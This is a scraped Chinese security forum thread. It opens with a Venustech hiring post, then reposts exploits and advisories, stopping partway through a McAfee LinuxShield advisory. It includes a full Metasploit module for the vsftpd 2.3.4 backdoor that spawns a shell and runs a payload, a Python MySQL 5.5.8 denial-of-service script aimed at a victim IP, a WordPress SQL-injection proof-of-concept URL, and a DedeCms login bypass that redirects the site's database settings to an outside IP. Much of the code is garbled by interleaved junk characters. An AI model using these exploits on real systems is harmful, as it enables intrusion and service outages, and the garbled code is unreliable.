最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
      Z) F- M" u5 g7 d/ ?5 n: H. [( k1 p: u$ G: {

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    . a6 d" }4 I5 f( R# A安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.& R0 M. h' A* m3 d# }
    精通C语言编程

    2.
    ) M' C1 M2 u- X) c熟练使用Linux操作系统,精通 Linux下C语言编程

    3.
    & A8 H6 `# y4 L: v; y; I精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.
    5 V% d- s) {6 i/ @熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    5 Y4 `, S, u$ V熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    ( r1 \8 T: A2 q( F* C负责产品的系统测试、集成测试工作

    2.
    4 n7 l0 I( T$ I$ h' u7 Z负责产品用例的编写,执行、修改

    3.5 D. {; q5 I8 N' E7 N
    负责产品性能的测试

    4./ R" J* E# C3 p; |1 k+ j
    负责对外项目的支持和测试工作

    岗位要求:

    1.
    / T9 v. C4 B6 h3 j7 t( d; j( q0 ?2 Q掌握基本的tcp/ip知识

    2.
    ; V' m' A1 s/ @4 w. K: b, x6 o数通基础好

    3.- r" A- V+ r& D& \; ]: }4 U
    对linux有一定的基础

    4.
    2 K7 O- W, S6 C# S掌握数据库的搭建和使用

    5.
    + p" W- t, z7 o* J  d& c至少熟悉一种编程语言C/Perl/VBS/TCL

    6.
    6 W/ [1 K6 {# p- Y: p) w熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.
    - D" N# R- i( M7 D% V熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.5 B1 l( F7 E9 t7 F
    对网络安全设备在网络中的部署有一定的认识

    9.
    + D/ {1 G5 _0 q. ^+ n6 X; b掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.
    5 t1 V9 c' O( W. j% `  y( X
    木&马检测服务、WEB漏洞扫描服务的实施

    2.7 T( U9 R2 D6 C2 t2 a, m2 L1 Y; U
    对服务客户的技术支持

    3.# T" O, a$ Z& s5 T
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    + G5 u( K0 K& z' L9 j) D3 R
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.% e0 O* `# b5 j5 ^4 P7 u% K! Q
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
    4 x  e1 w2 _. ?7 i+ `6 ?
    * @$ C$ _9 z' ?. C: G: n+ A
    8 i; Y* L8 ~* z0 Z: E. u. D% w* q
    , {1 J  x% I7 f3 x& x# krequire msf/core/ T* d8 H+ I5 i: W2 J
    0 {0 g6 l5 `$ q( |4 }$ ?' r4 i
    class Metasploit3 < Msf::Exploit::Remote+ `- ~& c4 o0 S. }& G, `9 P3 K
    Rank = ExcellentRanking& ~* s# T" f& @

    3 D  }7 h. m9 j9 X# a/ T2 ginclude Msf::Exploit::Remote::Tcp
    9 {; \6 R$ F+ f- C; T, x+ [5 b7 d, ~" H
    def initialize(info = {})
    5 K5 v: \! h  f) ~) w! `super(update_info(info1 F$ i% P. @; z5 o- v* l2 f2 G
    Name => VSFTPD v2.3.4 Backdoor Command Execution
    " g! K+ ^# X: \3 S  A$ {) J2 \Descript_ion => %q{
    : z- P. l  f6 A; aThis module exploits a malicious backdoor that was added to the VSFTPD download5 j, z# [9 U; x6 X6 U
    archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between* I/ U6 [. K3 g1 M; m7 h9 ^
    June 30th 2011 and July 1st 2011 according to the most recent information4 h/ [, g/ x/ G" @) c- ]4 p9 T1 I
    available. This backdoor was removed on July 3rd 2011.
    / H. w/ R. R$ M3 M) C  ~7 f$ O}1 y7 V- n0 E5 O3 k/ @: b
    Author => [ hdm mc ]9 f# Y% T! r$ w8 k; A1 \! t( l7 a
    License => MSF_LICENSE. U. Y& d. L8 D7 F" B: A! v
    Version => $Revision: 13099 $7 F0 b9 Q% ?: B" e
    References =>
    # A, B+ n- `4 e5 z/ v4 U[
    ! K2 P9 o/ f: T8 `/ N7 h3 P8 m[ URL http://pastebin.com/AetT9sS5], e1 J  @& i9 z' C2 R% ^
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]( x4 T1 p+ Q& T4 n
    ]- d5 p* S5 N6 v$ b; K# ^
    Privileged => true
      \. d7 \4 G' E( ~" vPlatform => [ unix ]" n! D( b5 V# t( B! r: G  q3 F
    Arch => ARCH_CMD
    ( Y4 c% w4 ]6 G0 y  nPayload =>
    + q% O* M! S1 ~! N! C# e{
    $ T2 U* C" _( J8 j0 v3 V$ U- l( C4 V( ESpace => 20006 t( S; N( }8 o" }: S' A  k4 P2 _
    BadChars => 7 l6 ?$ Q4 U) E& F
    DisableNops => true
    * W3 i/ b) V# CCompat =>
    9 T, M. Q! z7 }& u1 H. a0 ]! O{0 h: v' N: J0 D5 B
    PayloadType => cmd_interact- f, w) x( v9 V( w; ~  d
    ConnectionType => find6 V0 a4 B, C% }
    }
    & X3 F0 e% t1 v+ [; K* R}/ i/ K, @2 S4 J8 t2 @
    Targets =>$ I" `( u+ ]7 D: n2 Q+ Z6 K
    [. B% w1 x& `* ^& I3 A" d% @
    [ Automatic { } ]% M3 ^0 J1 _4 h) X4 K
    ]
    " S. T5 q& Y( v+ @+ Q3 [DisclosureDate => Jul 3 20117 A1 e6 b3 u' w/ n. ^* {1 j1 X; g
    DefaultTarget => 0))
    ' W$ F  T& h# i3 I
    $ H/ ~* ^6 o6 H& p' }' q3 \register_options([ Opt::RPORT(21) ] self.class)' B- [$ E6 @/ ^
    end) |3 g& _+ \" N* \+ x+ j# A

    - w$ A" [1 r8 \$ u- Z. qdef exploit
    % q, x& _- A5 B  d: d% k8 P+ K( k8 ?. I2 _' h6 b
    nsock = self.connect(false {RPORT => 6200}) rescue nil& e+ T$ g3 x8 g& {
    if nsock. X4 q- ]# r- M  Z8 u
    print_status(The port used by the backdoor bind listener is already open)! W( f, A" k! `* M; m
    handle_backdoor(nsock), d8 x) L4 R* \! ~
    return+ ?" p4 \1 x! h- L5 q
    end' Z6 g: I) T% l- G7 ~
      z0 H6 v/ F7 B/ [) o1 S/ v' p4 z- X
    # Connect to the FTP service port first2 j1 Z) i/ y! G: q
    connect
    . \# Y  R  g0 A, R6 \. ~: ]" }2 f: e; X* Z. s/ S1 j
    banner = sock.get_once(-1 30).to_s
    9 t, n1 g; V, W; C  }0 x$ D% R, sprint_status(Banner: #{banner.strip})7 |* [* G& p* B3 u" m
    ! Z9 G. @9 |0 ~6 H7 B& N
    sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)# i) r% F( W" z/ M9 p+ N& r- s9 c! D
    )$ o5 b. i' p2 I, b5 y+ \
    resp = sock.get_once(-1 30).to_s
    8 M% m+ I( `* `, j  Aprint_status(USER: #{resp.strip})1 z) r( d$ P# \: b' f, _, P2 H
    $ n0 J* w5 S3 \0 q, g9 F" I1 l* c% N% D
    if resp =~ /^530 /
    9 r& q: |8 p" K" M' v' M- d' e3 ]. oprint_error(This server is configured for anonymous only and the backdoor code cannot be reached)+ W" F' R; H; s! Z# o
    disconnect
    + Z7 _' m# p% m6 K# x: g8 Qreturn  `# b$ M% N  m" h- d
    end$ g/ V( `. E7 E. w3 o0 W
    ( f8 x8 Z1 W4 w2 ]. V* `
    if resp !~ /^331 /2 X) @2 b% V- V, |7 }
    print_error(This server did not respond as expected: #{resp.strip})
    . p5 M; Q8 d6 e9 [; b8 n" \disconnect
    5 t7 ^- D3 |1 k6 y8 w, w' b0 p0 _return1 y7 A% F4 h, @0 i" s
    end
    5 ]4 \+ U5 m: S% z( o) z# [# F; {) G7 C  V9 J
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}2 L2 O; j4 S6 ?5 E( P5 w
    )- Y0 k5 h, P6 {8 k& l1 B5 A
    $ m* Z- E3 j( s, a
    # Do not bother reading the response from password just try the backdoor
    , B: |5 U( d/ I3 L  `nsock = self.connect(false {RPORT => 6200}) rescue nil# E/ C( f0 {3 C; g
    if nsock8 H* q8 A: z! S! a  O; [9 s
    print_good(Backdoor service has been spawned handling...)' n* M& V* |  h# a( a9 a4 e
    handle_backdoor(nsock)& q6 d7 R) i# F4 \9 T2 I
    return0 z& Y. k7 x: o' ~6 q1 A8 r
    end4 T+ \6 |0 ]0 r' ?; i# n5 G& d

    9 N4 k, l/ }$ y" |disconnect
    4 l2 C/ q5 c+ h. \7 V  g4 r0 i& d8 J9 z! T" j& }
    end8 B# i5 F9 Z3 Q
    8 b& V6 {. e- N% s
    def handle_backdoor(s)
    / R' e1 X9 f3 i, D" t1 v, Z" h8 y# u3 k' v6 i
    s.put(id
    . w. I7 m/ s  f6 M* Y! E)
    % v2 `/ V% A( x) ]: x* a1 P. z7 C) x7 Q* G
    r = s.get_once(-1 5).to_s+ ]: U: t, w$ p3 y/ g: a
    if r !~ /uid=/3 D# B. L7 l0 y; j# [
    print_error(The service on port 6200 does not appear to be a shell)
    - a$ f) n! D" E4 h6 E7 _disconnect(s)
    7 ]5 X) u) V/ C% }return2 G0 D6 N* S, b" r; Z# ~
    end
    1 v# Q( _/ t5 `: v9 a
    3 z6 H* r( D1 u3 Hprint_good(UID: #{r.strip})
    9 e6 ?  |. I( D8 [
    # R/ t; w2 i+ N3 }s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)* d* G" ?; W5 P  J  p* f# T! r  l
    handler(s)$ P; D& G1 M9 T8 Q& Z  E: R1 x, C5 U
    end; h2 H3 T  H0 i
    3 |5 k2 K; T+ j3 R( b# Q+ U2 j0 P
    end复制代码
    ) `$ s# R  I, c/ R. k9 \: C( w8 p& {) M' v/ D
    % E+ @, i3 a" A0 u# [  z
    * Z  \. S& E0 p8 G* w% l
    % C; ?/ _8 c/ L& ]4 d+ g( G
    ' p, K" x/ F7 }6 _$ d& M$ L7 V' X" [

    0 w0 m7 K, Q3 @+ i' Y. d
    ) ~0 v4 I  a. V) N6 d0 b' ~/ H' H5 M) f! @' n" n  ~

    7 m2 u% f& U2 K  w% G. d, x) W
    8 N& K: c  s: T0 M+ F$ `+ a. c; B% @( i1 C

    ( n4 H2 m" ?1 E9 l& t" f) q6 I" P5 O' J- Q- D7 X

    5 I' ?# O- ~' q, K2 }, x5 P" L: B+ R9 E+ y& A
    ) q3 Y0 B# G4 L
    4 E. G6 C" {. T

    3 r' V0 `6 M% U2 A8 X& x/ `公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:1 U- r7 y& C8 Q$ a5 ~5 P% Z
      % E! V) F# [/ m' u
         & G% P: U' s# o+ [
      " I' G/ X. n! O
    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    / n) ?1 ^1 B+ b" Qallows an authenticated user to execute arbitrary SQL commands via the id
    . c' L+ n/ H& P3 V! H: E7 w3 nparameter to wp-admin/admin.php. ( F+ {$ D9 p0 l( c; I
      + c: p; i6 N# {
       
    9 V1 q4 s: x5 y+ Q( q6 l: t# w4 E  
    7 T+ h7 H7 l9 t4 E. y2. Proof of Concept:7 Y* g" l+ {1 i. ?/ X2 N
      ! S7 p6 h% j7 `( |+ B( d+ H2 V
       
    ) B3 {) N) R6 j- f- q  
    + T) n" @9 y) [http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
    0 d5 A* ?# R- r! A$ y$ n# L6 v7 c  L=1 AND SLEEP(10)1 l1 u' i: N8 V# }0 K

    0 p- t6 t2 ]. D* o1 g. ]% A  
    * a% s4 P/ T6 T: a) `# {+ c   
    6 f: g5 i/ K% @! G( I6 L  G  
    - S5 A, v1 ~& d1 b* N6 h0 q1 S3. Solution:* }$ ?4 @* N: q6 \. K- R
      
    7 Z* |- t) O  Q/ Q4 d     
    " R8 o4 A4 I: s2 d9 f$ |  6 F4 x2 r) W0 ?  O) p( R
    The plugin has been removed from WordPress. Deactivate the plug-in and wait* D0 E/ K4 Y& o- e% S* W, z
    for a hotfix.5 P* X0 h" U. ]  A6 d
      
    & n. b, d  A3 G, w$ c! [   . S! L) m0 Y3 u, ?0 k
      
    8 g; I6 y! v8 D( d4. Reference:# }+ j- f1 M5 E" Q+ q
      # c0 @( y# O, `" f$ l
       - ^$ }: P6 o' y
      ( W$ Q+ u1 m. m( L' M% S* X
    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
    1 Y0 f1 a. E/ _& l8 ]9 y0 Xction-sqli/, f3 {' ?/ H+ x+ d" m( H5 P7 J
      8 R! h" @' L/ x8 S1 O( t9 m9 r- x
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429+ d5 S4 j* n. V: [  q

    * s8 Q% h( E4 A" c4 X( e  D
    7 t: r# J. L' ~" y# H5 r- h6 {* o" D; r
    # d& g6 E5 r/ e2 P! J: @
    . W; @! q* o/ i& b1 n, c5 D

    # L) J! I+ d4 ~; S$ s, [  i: R" u. A# K+ N) X" C( Q+ ~

    " h7 _, G4 K. F8 }: M4 {6 t% Y9 H
    1 e8 f% k' v/ D2 C5 S( ~: }" R) K6 |8 o
    7 s6 A* m* T. [, P4 [2 v0 _+ M5 k( c
    ; L- }1 U( c- B8 l: b4 L! Y2 ?1 J+ L6 m

    % Q3 i; y( f4 U8 S
    $ C# l; P* _8 H3 p; `1 d' y9 N8 M/ P1 X! ?9 E

    " k5 |  E! z/ K- v, y
    # O2 [& }7 U2 K2 Q5 a  j) ~% H* g
    # }& M8 R" L4 g9 M8 Z公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys! f4 R6 q  _) t' ]" L2 E- o/ X- d

    ) ?- J1 H9 p+ ~4 j% `* N( jprint "
    , ~$ I4 B$ ~6 p( v6 k$ H"
    - p2 z& n3 r5 k: ]print "----------------------------------------------------------------"* R, [, z. E! P- j5 p* u0 U
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    + g5 k/ v" w: v2 ]$ sprint "| Level Smash the Stack                                         |"
    * H3 \: F0 |% r0 bprint "----------------------------------------------------------------"' S. E' Z1 n& S
    print "
    ; x+ s' c: @4 Y9 f% I"! k1 `$ q! Y' {8 m5 h2 ?
    " r- N1 C/ H; J% m
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    . f$ ^2 O5 `0 V/ ~/ C/ L2 Q  `"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
    9 v0 N& K% u) K+ V) _7 h0 q9 M$ d & T9 E: g2 S% A% Y) g3 P
    buf2=("x11x00x00x00x03set autocommit30")! I0 N8 d, `3 ?' I5 D$ H( W; P2 z

    ' v* [/ i3 F; R+ X# S5 ^def usage():9 _2 r, m5 W( T0 c0 |6 @2 t
    print "usage : ./mysql.py <victim_ip>"+ W/ f. i' h3 i  @+ ?- r( E) o
    print "example: ./mysql.py 192.168.1.22"
    5 t6 a! |3 \& v) Y * u  P7 Z, A" W( a5 f

    " g: r: w0 N3 hdef main():
    0 g9 c4 ~4 _% [# j4 R: f- }if len(sys.argv) != 2:+ f, i+ R& o. u& S0 E
    usage()% R) ^. ]0 O) E: _5 y* [$ Q' C
    sys.exit()& [2 W0 C/ r1 L/ b8 X& I
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ; o( @3 x0 M8 O$ B! }4 A: c5 X7 E% O
    5 I$ S' y9 o3 Q" q1 zHOST = sys.argv[1]) m; \. t7 `- R/ `
    PORT = int(3306)5 y. u6 v$ M( L8 K7 \0 a
    s.connect((HOST,PORT))5 w% M. |: r8 P! y, U0 g4 Z8 l
    print "
  • Connect"
    / k+ b! w. Y# m9 J( Ds.send(buf)
    6 l$ Y" r$ g4 T# o0 Q; Nprint "
  • Payload 1 sent"
    # F; F* K) E4 K8 x7 r/ as.send(buf2)
    : q5 ?$ v9 J% Q) L2 ]' e! ^print "
  • Payload 2 sent+ [: H+ C& k# c3 Y, q- d6 C4 e
    ", "
  • Run again to ensure it is down..& M- ~; d) a  C
    ") _! I& m$ ?! X$ r9 Y( Q& _' r, M
    s.close()
    ( S! P4 a9 E& Y# x8 i& v4 F
    + g# d& H2 U4 N! |, J: J* Yif __name__ == "__main__":
    , A: N3 C& d3 e( Imain()* K& v; O3 C* h0 g

    , a8 O! B$ O- \1 @' f# |4 f- R6 T. j  h4 d
    # O. }8 }- e9 }7 v( q2 C

    1 {- C. d2 x2 I% }5 l8 {4 Y, p! A1 p% J9 |6 d5 B
    ; g# g( Q) m- W
    7 j& Q: c8 L( f- n) H

    % |- f- L4 T* Q9 B# w" R% ?  X' |
    1 x# i; y2 F/ j) X/ A7 D: b
    , Q- E4 j" g6 W; k+ Z
    ) s. q1 }* Y4 a- \# @- ^# a( v: }& ?/ f, W
    4 C5 }( `" d1 t$ P4 [
    : Y, h; K) q& {- P, d. k* |7 O- x

    : r4 C% W, Y' Y8 T
    # x0 x! V. y4 @$ t7 D* a' J
    # S* `2 W! x( j/ s1 c/ z- U
    1 r1 `8 L/ J. ?4 Q' D. O公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机

    ) e" V2 b3 z5 a9 t: m; Lhttp://www.sitedir.com.cn/video/4.swf
    * \2 V+ z- ^( h- g- k! S; G( [& y; ^% W& O/ |1 L! g
    9 Y5 a6 R: D7 z  E* W
    ; P& f$ _# J6 D) \# C

    / L6 x  ?3 W2 E2 F* m4 D( t% ?% v! ]4 H7 F6 o* [- v$ J
    * M1 S! `7 V! o, p0 o3 q' ]

    / J' V4 r0 \' Q; X6 S' \3 }) l+ R, f2 a9 J5 z+ B. l7 Q9 v8 _) [

    3 H! @$ ^% f. ]! g: ]: k, U  K0 C0 u: P
    * |& v7 m- J6 c8 c) ]% B) f' w3 s

      }% i: m+ P, V) }0 u. A- a+ _2 c3 X/ a$ i: o( @* a

    : Q1 U. O% v7 \1 ^6 ]! c" }( _* t6 L, }; \# }* {
    3 ]. z5 S" t1 }; j9 H5 L. A
    % \0 X1 N# @0 L- G' y% B5 o' Q

    ' {& W! Y3 ^! ?4 p* O) f* |公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    " z$ R# @% K. C6 J# L4 q
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    8 e: R2 @! m6 T" C
    此漏洞的前提是必须得到后台路径才能实现
    $ ]" Z6 |  u3 K* N9 k  W
    官方临时解决办法:
    & V* m7 e' H7 }# V
    找到include/common.inc.php文件,把:

    . J# F" R. }; @& g
        foreach($_REQUEST as $_k=>$_v)' w' j- R. r2 O
        {+ `  L8 ]  _" M4 s
            var_dump($_k);
    3 m; o, V) ]! I7 u1 ^        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    6 a+ n! u- H3 i) @4 Z  c& a        {5 o1 @6 c' H5 G" K6 W5 S
                exit('Request var not allow!');
    + l1 ^9 \6 K0 X3 q2 ?, _        }0 k% v1 t8 c( R/ ]0 b
        }
    9 `  j* ?1 H8 }% U( o- d
    换成:

    " F& A7 i; V( a/ A2 W
        //检查和注册外部提交的变量' U8 k9 D9 }6 z/ e
        function CheckRequest(&amp;$val) {
    : r4 j+ k' P  f( P9 @. ]' Z  ?        if (is_array($val)) {% g8 L2 X8 p2 o, y
                foreach ($val as $_k=>$_v) {
    1 J1 }/ y* w5 i+ D% ~                CheckRequest($_k);
    * ?9 Z: {8 K7 A* Z                CheckRequest($val[$_k]);& G4 ^, q4 e( P% W2 L1 F" i1 _
                }# V4 m# I, X" w1 T1 l3 m( ^/ r, v/ ~
            } else% N7 _8 H. W6 g4 H/ F
            {9 X" q. u0 U7 o$ D, f: a  M! _3 D
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )
    # z3 e' @+ V3 \$ }5 v( h            {
    ( [8 r! u" [' @# |) @& J+ ?; I- |                exit('Request var not allow!');* {( d$ G9 k! c' E* ~
                }  w% p) B, k, @8 W1 O, S0 _1 D9 d0 h
            }
    ' P5 Q( @& G# y9 d  r    }* i* l3 T: C& I) U1 l
        CheckRequest($_REQUEST);1 B0 x1 W" Y3 w5 u! s5 ]; P3 }

    2 ?' f2 R* c( Y4 _
    5 u( S" j7 ?2 {0 c8 b1 @/ r2 D' P6 j0 h) q) f; }

    ( k1 |! L1 _5 M# t2 G
    ' Y" C) q( ^; p7 e7 z; x+ I3 x3 U5 F7 x; ~# n
    / }1 k4 _  Z' K1 W, w8 j5 x4 V

    ) N/ H2 T" @5 o- `- d
    ; \- Q2 F5 W) `8 ]- b4 ]" x! Q* E1 Y6 E$ N2 y" A/ Z
    , B7 Y% C0 S4 Q9 V3 A9 p) N
    3 X% o. I4 y$ f( C1 g( I8 }" D2 e7 q

    ! s4 Y* D$ {7 |' I+ C. k  H/ N6 H  _$ N

    4 K: X7 _3 u1 S$ U/ j2 f+ o
    6 y  e' C8 O& J& g, y
    * A. E3 V8 I: y
    % P# F8 i7 K9 Q& N: V
    3 ?9 U. d) d) u0 a公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>
    ) I- a! d) @4 u2 N( G6 I. p0 @: t9 A+ V4 P- f
    http://www.sitedir.com.cn/video/8.swf[/quote]
    0 y8 n  Q3 @* B% S9 {! T. D& G1 B& N' A, D

    # K3 ]0 `+ U" J' ^: ?$ `) _. l1 ?' ]7 t% x+ h

    . s. H* o/ c# {( U+ N5 F; s6 V8 A
    3 A/ V2 J* a0 }6 t7 ?
    1 Y7 c' n0 w9 C9 \/ b$ e& @. w0 T$ w4 f6 p6 T5 i1 U/ r4 ^; _: z

    0 e8 ~2 w8 X* d- M
    : [* T4 M9 k8 ?, N# J. V* k2 T' M) M7 b

    * r9 P/ M3 U; z  n% j, S* e" w+ t! c8 R/ D$ B$ t
      a( c+ {9 E+ p# b) v5 v- E+ u
    . c9 b% Y0 f* q- i& ?$ p

    8 ~2 i3 f8 g0 x6 P% m, {9 {- E4 u- b& G
    6 m3 A8 _4 R( P2 ^/ c

    & ?3 p  ?9 h8 ?% R9 e5 R- s+ ?! {公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    : I4 S' L1 M8 g- ^; O: Y
    影响版本:
    + w( x) y* H8 WDjango 1.2.5$ ^, z7 i% ~6 D. J
    Django 1.3 beta 1. J' G% j( G7 O
    Django 1.2.4) C6 }: j& ?& L+ F9 {7 x+ V
    Django 1.2.29 k4 f5 Q4 v$ M. C; u; a. ^( N' y8 v
    Django 1.2
    / W# V! J7 c  s1 K7 o0 N
    漏洞描述:
      R3 v" B7 w, X: x
    Django是一款开放源代码的Web应用框架,由Python写成。
    6 t# v. T9 S; R& m# s7 n0 u, z" }0 D! eDjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    0 o, [( I& q0 l+ U5 r1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。: @! j+ d: B) K
    2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。! F5 M( _  e" W. d3 E/ M
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。3 _& D: K9 Y! i, s+ K( l
    4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。

    6 o) ?3 o/ S3 d5 T
    细节参考: ) E2 ?, G" ~( y) p- q4 S
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    # J6 `. w& U+ @( `( O3 l5 [http://secunia.com/advisories/45939/

    / x. ^3 a! ], ]3 O* `
      w2 g$ p% k/ B9 v( F
      z! e9 ~$ s9 Q0 b

    ) u0 T/ z; g6 U0 P+ L2 L, R: R  {$ J9 P; e* R

    - J* m& e, e& J1 ^0 T2 }6 }: B. c; Z$ i+ Z% u5 J$ f
    / v9 ^0 w. Z+ `" _. E7 e

    ! t/ z5 L& q) H8 j8 v2 ^2 Q+ I* W/ @  V4 y

    + B- ]- z& `& o$ S
    9 @( T" G. U, e- n8 G& z2 f$ |1 z1 ^- e
    3 r( F' N7 |9 ?) i7 N) B! e
    * q+ W  e3 e/ h6 b
    , Y8 U& g- }' D: |
    3 N0 W6 C/ M) S8 I" q

    . [, u1 e7 \! m# u% J+ j$ L% K, U8 X$ d5 E: `$ n9 n

    * e8 y1 d+ z% \/ k+ V* c公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
    : f  P# H2 q+ f7 E# T3 P影响版本: McAfee LinuxShield <= 1.5.1
    " O5 W8 v8 W( I# y7 m远程攻击: Yes 8 k. C7 W) t) d' i0 l% |
    本地溢出: Yes, F5 `& l* g0 D1 Z
    背景阅读:& U! N# k/ l# a( i( B- N4 ]; ]9 o
    ===========
    + i( \. T, J% s+ `9 j# h. A
    " [0 h$ Y; s! h# PLinuxShield detects and removes viruses and other potentially unwanted) B0 T/ b: t0 L; T% o$ V/ B
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    7 L+ n, Z+ M; Q/ `scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our
    % Z2 k$ w' G. c$ x! e% tanti-virus products.
    + X5 G! O9 j1 Q- e) z
    - R3 y- [! u6 |8 |Although a few years ago, the Linux operating system was considered a: U; _. J0 }/ a0 t6 J; t( ]1 T
    secure environment, it is now seeing more occurrences of software& g7 i' `* V/ u; R- Y4 C/ p
    specifically written to attack or exploit security weaknesses in
    + Z- I4 s0 l: `Linux-based systems. Increasingly, Linux-based systems interact with1 s" y1 I, N" ?9 X: h
    Windows-based computers. Although viruses written to attack Windows-" `; F: z- M1 V9 m8 m5 g4 {5 o$ J
    based systems do not directly attack Linux systems, a Linux server
    ) x! L  ~; {) F% @9 w+ qcan harbor these viruses, ready to infect any client that connects to
    " }, h& T: l0 }8 B- h$ s$ ~it.$ i/ H0 s$ g; S$ [0 l, q, {% w1 e
    0 o3 h: @  c2 V) F0 i
    When installed on your Linux systems, LinuxShield provides protection
    % `# I5 s7 t5 y/ I' Wagainst viruses, Trojan horses, and other types of potentially
    ) }- s# T- Y/ s' C% sunwanted software.$ z7 X4 r2 h! t
    + t; D0 [+ N# @2 t
    LinuxShield scans files as they are opened and closed# R3 _0 y8 e) M; A
    ?&amp;#65533;&amp;#65533; a technique" i: E' p# A8 {
    known as on-access scanning. LinuxShield also incorporates an( s5 d& G/ e+ o1 `
    on-demand scanner that enables you to scan any directory or file in
    ( l0 n& l, k( ^9 P8 H$ Dyour host at any time.
    . l$ L) X5 n1 d$ Z: E# p- G# ]2 K
    ! }' Q' Y) H# ?( v# AWhen kept up-to-date with the latest virus-definition (DAT) files,! ^2 ?, E  L7 S9 h, U& F
    LinuxShield is an important part of your network security. We; N8 }" T. a) x
    recommend that you set up an anti-virus security policy for your
